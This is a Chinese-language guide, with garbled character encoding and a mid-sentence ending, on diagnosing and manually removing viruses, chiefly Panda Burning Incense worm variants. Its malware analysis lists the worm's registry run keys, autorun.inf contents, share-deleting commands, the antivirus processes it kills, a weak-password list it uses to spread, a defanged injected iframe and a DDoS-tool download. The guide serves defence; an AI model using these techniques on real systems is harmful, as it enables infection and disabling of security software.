如何全面清除計算機病毒

1、滅毒有招如何全面清除計算機病毒（防毒技巧）網(wǎng)絡(luò)時代，病毒已經(jīng)無所不在。在層出不窮、變化多端的病毒襲擊下，中招基本上是不可避免的了。那么中招以后我們改如何處理（當然必須處理，否則計算機沒法替你工作）？是格式化系統(tǒng)然后重裝Windows,還是請人幫忙。因為職業(yè)關(guān)系，我不得不與這些讓人討厭的東西戰(zhàn)斗著，逐步地積累了一些行之有效的辦法，供大家參考。一、中毒的一些表現(xiàn)我們怎樣知道電腦中病毒了呢？其實電腦中毒跟人生病一樣，總會有一些明顯的癥狀表現(xiàn)出來。例如機器運行十分緩慢、上不了網(wǎng)、殺毒軟件生不了級、word文檔打不開，電腦不能正常啟動、硬盤分區(qū)找不到了、數(shù)據(jù)丟失等等，就是中毒的一些征兆。二、中毒診斷1、

2、按Ctrl+Shift+Ese鍵（同時按此三鍵），調(diào)出windows任務(wù)管理器查看系統(tǒng)運行的進程，找出不熟悉進程并記下其名稱（這需要經(jīng)驗），如果這些進程是病毒的話，以便于后面的清除。暫時不要結(jié)束這些進程，因為有的病毒或非法的進程可能在此沒法結(jié)束。點擊性能查看CPU和內(nèi)存的當前狀態(tài)，如果CPU的利用率接近100%或內(nèi)存的占用值居高不下，此時電腦中毒的可能性是95%。2、查看windows當前啟動的服務(wù)項，由控制面板”的管理工具”里打開服務(wù)”?？从覚跔顟B(tài)為啟動”啟動類別為自動”項的行；一般而言，正常的windows服務(wù)，基本上是有描述內(nèi)容的（少數(shù)被駭客或蠕蟲病毒偽造的除外），此時雙擊打開認為有問題

3、的服務(wù)項查看其屬性里的可執(zhí)行文件的路徑和名稱，假如其名稱和路徑為C:winntsystem32explored.exe，計算機中招。有一種情況是控制面板”打不開或者是所有里面的圖標跑到左邊，中間有一縱向的滾動條，而右邊為空白，再雙擊添加/刪除程序或管理工具，窗體內(nèi)是空的，這是病毒文件winhlpp32.exe發(fā)作的特性。3、運行注冊表編輯器，命令為regedit或regedt32,查看都有那些程序與windows一起啟動。主要看Hkey_Local_MachineSoftwareMicroSoftWindowsCurrentVersionRun和后面幾個RunOnce等，查看窗體右側(cè)的項值，看

4、是否有非法的啟動項。WindowsXp運行msconfig也起相同的作用。隨著經(jīng)驗的積累，你可以輕易的判斷病毒的啟動項。4、用瀏覽器上網(wǎng)判斷。前一陣發(fā)作的Gaobot病毒，可以上,等網(wǎng)站,但是不能訪問諸如,這樣著名的安全廠商的網(wǎng)站，安裝了symantecNorton2004的殺毒軟件不能上網(wǎng)升級。5、取消隱藏屬性，查看系統(tǒng)文件夾winnt（windows）system32,如果打開后文件夾為空，表明電腦已經(jīng)中毒；打開system32后，可以對圖標按類型排序，看有沒有流行病毒的執(zhí)行文件存在。順便查一下文件夾Tasks,wins,drivers.目前有的病毒執(zhí)行文件就藏身于此；driversetc

5、下的文件hosts是病毒喜歡篡改的對象，它本來只有700字節(jié)左右，被篡改后就成了1Kb以上，這是造成一般網(wǎng)站能訪問而安全廠商網(wǎng)站不能訪問、著名殺毒軟件不能升級的原因所在。6、由殺毒軟件判斷是否中毒，如果中毒，殺毒軟件會被病毒程序自動終止，并且手動升級失敗。三、滅毒1、在注冊表里刪除隨系統(tǒng)啟動的非法程序，然后在注冊表中搜索所有該鍵值，刪除之。當成系統(tǒng)服務(wù)啟動的病毒程序，會在Hkey_Local_MachineSystemControlSet001services和controlset002services里藏身，找到之后一并消滅。2、停止有問題的服務(wù)，改自動為禁止。3、如果文件system32d

6、riversetchosts被篡改，恢復(fù)它，即只剩下一行有效值“l(fā)ocalhost其余的行刪除。再把host設(shè)置成只讀。4、重啟電腦，據(jù)F8進帶網(wǎng)絡(luò)的安全模式”。目的是不讓病毒程序啟動，又可以對Windows升級打補丁和對殺毒軟件升級。5、搜索病毒的執(zhí)行文件，手動消滅之。6、對Windows升級打補丁和對殺毒軟件升級。7、關(guān)閉不必要的系統(tǒng)服務(wù)，如remoteregistryservice。8、第6步完成后用殺毒軟件對系統(tǒng)進行全面的掃描，剿滅漏網(wǎng)之魚。9、上步完成后，重啟計算機，完成所有操作。四、建議防范病毒作用遠甚于查殺病毒。因此建立嚴密的防范措施是十分必要的。在具備條件的大

7、中型網(wǎng)絡(luò)里，應(yīng)該軟硬兼施、立體防護。理想得到情況是：Internet的接入處是外網(wǎng)防火墻；緊接著是防毒網(wǎng)關(guān)（熊貓衛(wèi)士的性價比較高）；然后是路由器，服務(wù)器區(qū)，可為應(yīng)用服務(wù)器配置一臺病毒服務(wù)器；再往內(nèi)是內(nèi)網(wǎng)防火墻；內(nèi)網(wǎng)架設(shè)殺毒服務(wù)器，每個用戶都安裝殺毒軟件的可管理客戶端。怎樣預(yù)防熊貓燒香系列病毒？最近那個熊貓燒香病毒讓所有用電腦的人很生氣，熊貓這個國寶似乎不再可愛，而成了人人喊打的過街老鼠。熊貓變種實在太多，中招后的損失很嚴重，殺毒軟件一直在救火中。以下幾招很簡單易行，幫你預(yù)防熊貓燒香病毒，至少能明顯減少你中招的幾率。1 .立即檢查本機administrator組成員口令，一定放棄簡單口令甚至空口

8、令，安全的口令是字母數(shù)字特殊字符的組合，自己記得住，別讓病毒猜到就行。修改方法，右鍵單擊我的電腦，選擇管理，瀏覽到本地用戶和組，在右邊的窗格中，選擇具備管理員權(quán)限的用戶名，單擊右鍵，選擇設(shè)置密碼，輸入新密碼就行。2 .利用組策略，關(guān)閉所有驅(qū)動器的自動播放功能。步驟：單擊開始，運行，輸入gpedit.msc,打開組策略編輯器，瀏覽到計算機配置，管理模板，系統(tǒng)，在右邊的窗格中選擇關(guān)閉自動播放，該配置缺省是未配置，在下拉框中選擇所有驅(qū)動器，再選取已啟用，確定后關(guān)閉。最后，在開始，運行中輸入gpupdate,確定后，該策略就生效了。3 .修改文件夾選項，以查看不明文件的真實屬性，避免無意雙擊騙子程序中

9、毒。步驟：打開資源管理器（按windows徽標鍵+E）,點工具菜單下文件夾選項，再點查看，在高級設(shè)置中，選擇查看所有文件，取消隱藏受保護的操作系統(tǒng)文件，取消隱藏文件擴展名。4 .時刻保持操作系統(tǒng)獲得最新的安全更新，建議用殺毒軟件的漏洞掃描功能。5 .啟用windows防火墻保護本地計算機。熊貓燒香病毒專殺及手動修復(fù)方案本文介紹了熊貓燒香病毒、熊貓燒香病毒變種的查殺方法，及熊貓燒香病毒的手動清除方案。提供了病毒進程為spoclsv.exe和FuckJacks.exe變種的解決方案，和熊貓燒香病毒專殺工具。在動手查殺熊貓燒香病毒之前，強烈建議先注意以下四點：1 .本文包含兩種熊貓燒香病毒變種的描述

10、，請注意查看病毒癥狀，根據(jù)實際情況選用不同的查殺方法。2 .對于被熊貓燒香病毒感染的.exe可執(zhí)行文件，推薦先備份，再修復(fù)！3 .找回被熊貓燒香病毒刪除的ghost（.gho）文件，詳情請見文中！4 .對計算機了解不多的用戶，請在專家指導(dǎo)下清除熊貓燒香病毒。熊貓燒香病毒變種一：病毒進程為“spoclsv.exe”這是熊貓燒香”早期變種之一，特別之處是殺死殺毒軟件”，最惡劣之處在于感染全盤.exe文件和刪除.gho文件（Ghost的鏡像文件）。最有靈感”的一招莫過于在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代碼來調(diào)用病毒。目前所有專殺工具及殺毒軟件均不會修復(fù)此病毒行

11、為。需要手動清除病毒添加的代碼，且一定要清除。否則訪問了有此代碼的網(wǎng)頁，又會感染。其他老一點的熊貓燒香"spoclsv變種的病毒行為比此版本少。就不再單獨列出。病毒描述：武漢男生”，俗稱熊貓燒香”，這是一個感染型的蠕蟲病毒，它能感染系統(tǒng)中exe,com,pif,src,html,asp等文件，它還能中止大量的反病毒軟件進程并且會刪除擴展名為gho的文件，（.gho為GHOST的備份文件），使用戶的系統(tǒng)備份文件丟失。被感染的用戶系統(tǒng)中所有.exe可執(zhí)行文件全部被改成熊貓舉著三根香的模樣。以下是熊貓燒香病毒詳細行為和解決辦法：熊貓燒香病毒詳細行為：1 .復(fù)制自身到系統(tǒng)目錄下：%Syste

12、m%driversspoclsv.exe（"%System%代表Windows所在目錄，比如:C:Windows)不同的spoclsv.exe變種，此目錄可不同。比如12月爆發(fā)的變種目錄是:C:WINDOWSSystem32Driversspoclsv.exe。2 .創(chuàng)建啟動項：HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun"svcshare"="%System%driversspoclsv.exe"3 .在各分區(qū)根目錄生成病毒副本：X:setup.exeX:autorun.

13、infautorun.inf內(nèi)容：AutoRunOPEN=setup.exeshellexecute=setup.exeshellAutocommand=setup.exe4 .使用netshare命令關(guān)閉管理共享：cmd.exe/cnetshareX$/del/ycmd.exe/cnetshareadmin$/del/y5 .修改顯示所有文件和文件夾”設(shè)置：HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL"CheckedValue"=dwo

14、rd:000000006 .熊貓燒香病毒嘗試關(guān)閉安全軟件相關(guān)窗口：天網(wǎng)防火墻進程VirusScanNOD32網(wǎng)鏢殺毒毒霸瑞星江民黃山IE超級兔子優(yōu)化大師木馬清道夫木焉清道夫QQ病毒注冊表編輯器系統(tǒng)配置實用程序卡巴斯基反病毒SymantecAntiVirusDubaWindows任務(wù)管理器esteemprocs綠鷹PC密碼防盜噬菌體木馬輔助查找器SystemSafetyMonitorWrappedgiftKillerWinsockExpert游戲木馬檢測大師超級巡警msctls_statusbar32pjf(ustc)IceSwordViking病毒（威金病毒）進程:7 .嘗試結(jié)束安全軟件相關(guān)進

15、程以及Mcshield.exeVsTskMgr.exenaPrdMgr.exeUpdaterUI.exeTBMon.exescan32.exeRavmond.exeCCenter.exeRavTask.exeRav.exeRavmon.exeRavmonD.exeRavStub.exeKVXP.kxpKvMonXP.kxpKVCenter.kxpKVSrvXP.exeKRegEx.exeUIHost.exeTrojDie.kxpFrogAgent.exeLogo1_.exeLogo_1.exeRundl132.exe8 .禁用安全軟件相關(guān)服務(wù)：SchedulesharedaccessRsCCe

16、nterRsRavMonKVWSCKVSrvXPkavsvcAVPMcAfeeFrameworkMcShieldMcTaskManagernavapsvcwscsvcKPfwSvcSNDSrvcccProxyccEvtMgrccSetMgrSPBBCSvcSymantecCoreLCNPFMntorMskServiceFireSvc9 .刪除安全軟件相關(guān)啟動項：SOFTWAREMicrosoftWindowsCurrentVersionRunRavTaskSOFTWAREMicrosoftWindowsCurrentVersionRunKvMonXPSOFTWAREMicrosoftWindo

17、wsCurrentVersionRunkavSOFTWAREMicrosoftWindowsCurrentVersionRunKAVPersonal50SOFTWAREMicrosoftWindowsCurrentVersionRunMcAfeeUpdaterUISOFTWAREMicrosoftWindowsCurrentVersionRunNetworkAssociatesErrorReportingServiceSOFTWAREMicrosoftWindowsCurrentVersionRunShStatEXESOFTWAREMicrosoftWindowsCurrentVersionR

18、unYLive.exeSOFTWAREMicrosoftWindowsCurrentVersionRunyassistse10.遍歷目錄修改htm/html/asp/php/jsp/aspx等網(wǎng)頁文件，在這些文件尾部追加信息:<iframesrc="hxxp:/但不修改以下目錄中的網(wǎng)頁文件：C:WINDOWSC:WINNTC:system32C:DocumentsandSettingsC:SystemVolumeInformationC:RecycledProgramFilesWindowsNTProgramFilesWindowsUpdateProgramFilesWindo

19、wsMediaPlayerProgramFilesOutlookExpressProgramFilesInternetExplorerProgramFilesNetMeetingProgramFilesCommonFilesProgramFilesComPlusApplicationsProgramFilesMessengerProgramFilesInstallShieldInstallationInformationProgramFilesMSNProgramFilesMicrosoftFrontpageProgramFilesMovieMakerProgramFilesMSNGaminZ

20、one11 .在訪問過的目錄下生成Desktop_.ini文件，內(nèi)容為當前日期。12 .此外，病毒還會嘗試刪除GHO文件。病毒還嘗試使用弱密碼將副本以GameSetup.exe的文件名復(fù)制到局域網(wǎng)內(nèi)其它計算機中：passwordharleygolfpussymustangshadowfishqwertybaseballletmeincccadminabcpasspasswddatabaseabcdabc123sybase123qweservercomputersuper123asdihavenopassgodblessyouenablealpha1234qwer123abcaaapatrick

21、patadministratorrootsexgodfuckyoufucktesttest123temptemp123winasdfpwdqweryxcvzxcvhomexxxownerloginLoginlovemypcmypc123admin123mypassmypass123AdministratorGuestadminRoot病毒文件內(nèi)含有這些信息:whboy*武*漢*男*生*感*染*下*載*者*解決方案：1 .結(jié)束病毒進程：%System%driversspoclsv.exe不同的spoclsv.exe變種，此目錄可不同。比如12月爆發(fā)的變種目錄是：C:WINDOWSSystem32

22、Driversspoclsv.exe。但可用此方法清除?！?System%spoclsv.exe”是系統(tǒng)文件。（目前看來沒有出現(xiàn)插入該系統(tǒng)進程的變種，不排除變種的手法變化。）查看當前運行spoclsv.exe的路徑，可使用超級兔子魔法設(shè)置。2 .刪除病毒文件：%System%driversspoclsv.exe請注意區(qū)分病毒和系統(tǒng)文件。詳見步驟1。3 .刪除病毒啟動項：HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun"svcshare"="%System%driversspoclsv.exe&qu

23、ot;4 .通過分區(qū)盤符右鍵菜單中的打開”進入分區(qū)根目錄，刪除根目錄下的病毒文件：X:setup.exeX:autorun.inf5 .恢復(fù)被修改的顯示所有文件和文件夾”設(shè)置：HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL"CheckedValue"=dword:000000016 .修復(fù)或重新安裝被破壞的安全軟件。7 .修復(fù)被感染的程序?？捎脤⒐ぞ哌M行修復(fù)，收集了四個供讀者使用。金山熊貓燒香病毒專殺工具、安天熊貓燒香病毒專殺工具、江民熊

24、貓燒香病毒專殺工具和瑞星熊貓燒香病毒專殺工具。也可用手動方法(見本文末)。8 .恢復(fù)被修改的網(wǎng)頁文件，可以使用某些編輯網(wǎng)頁的工具替換被添加文字為空。機器上有htm/html/asp/php/jsp/aspx等網(wǎng)頁文件，一定要刪除此段代碼。有危險代碼的網(wǎng)頁一但發(fā)布到網(wǎng)頁可能會感染其他用戶。熊貓燒香病毒變種二：病毒進程為“FuckJacks.exe”以下是數(shù)據(jù)安全實驗室提供的信息與方法。病毒描述：含有病毒體的文件被運行后，病毒將自身拷貝至系統(tǒng)目錄，同時修改注冊表將自身設(shè)置為開機啟動項，并遍歷各個驅(qū)動器，將自身寫入磁盤根目錄下，增加一個Autorun.inf文件，使得用戶打開該盤時激活病毒體。隨后病

25、毒體開一個線程進行本地文件感染，同時開另外一個線程連接某網(wǎng)站下載ddos程序進行發(fā)動惡意攻擊。病毒基本情況：文件信息病毒名：Virus.Win32.EvilPanda.a.ex$大?。?xDA00(55808),(disk)0xDA00(55808)SHA1?:F0C3DA82E1620701AD2F0C8B531EEBEA0E8AF69D殼信息：未知危害級別：高病毒名：Flooder.Win32.FloodBots.a.ex$大？小：0xE800(59392),(disk)0xE800(59392)SHA1?:B71A7EF22A36DBE27E3830888DAFC3B2A7D5DA0D殼

26、信息：UPX0.89.6-1.02/1.05-1.24危害級別：高病毒行為：Virus.Win32.EvilPanda.a.ex$1、病毒體執(zhí)行后，將自身拷貝到系統(tǒng)目錄：%SystemRoot%system32FuckJacks.exe2、添加注冊表啟動項目確保自身在系統(tǒng)重啟動后被加載：鍵路徑：HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun鍵名：FuckJacks鍵值："CWINDOWSsystem32FuckJacks.exe"鍵路徑：HKEY_LOCAL_MACHINESOFTWAREMicrosof

27、tWindowsCurrentVersionRun鍵名：svohost鍵值："CWINDOWSsystem32FuckJacks.exe”3、拷貝自身到所有驅(qū)動器根目錄，命名為Setup.exe,并生成一個autorun.inf使得用戶打開該盤運行病毒，并將這兩個文件屬性設(shè)置為隱藏、只讀、系統(tǒng)。C:autorun.inf?1KB?RHSC:setup.exe?230KB?RHS4、關(guān)閉眾多殺毒軟件和安全工具。5、連接*.3322.org下載某文件，并根據(jù)該文件記錄的地址，去www.*.com下載某ddos程序，下載成功后執(zhí)行該程序。6、刷新,某QQ秀鏈接。7、循環(huán)遍歷磁盤目錄，感染文件，對關(guān)鍵系統(tǒng)文件跳過，不感染W(wǎng)indows媒體播放器、MSN、IE等程序。Flooder.Win32.FloodBots.a.ex$1、病毒體執(zhí)行后，將自身拷貝到系統(tǒng)目錄：%SystemRoot%SVCH0ST.EXE（注意文件名中的“虛數(shù)字零”，不是字母“?！?SystemRoot%system32SVCH0ST.EXE（注意文件名中的“面數(shù)字零”，不是字母"o）2、該病毒后下載運行后，添加注冊表啟動項目確保自身在系統(tǒng)重啟動后被加載：鍵路徑：HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion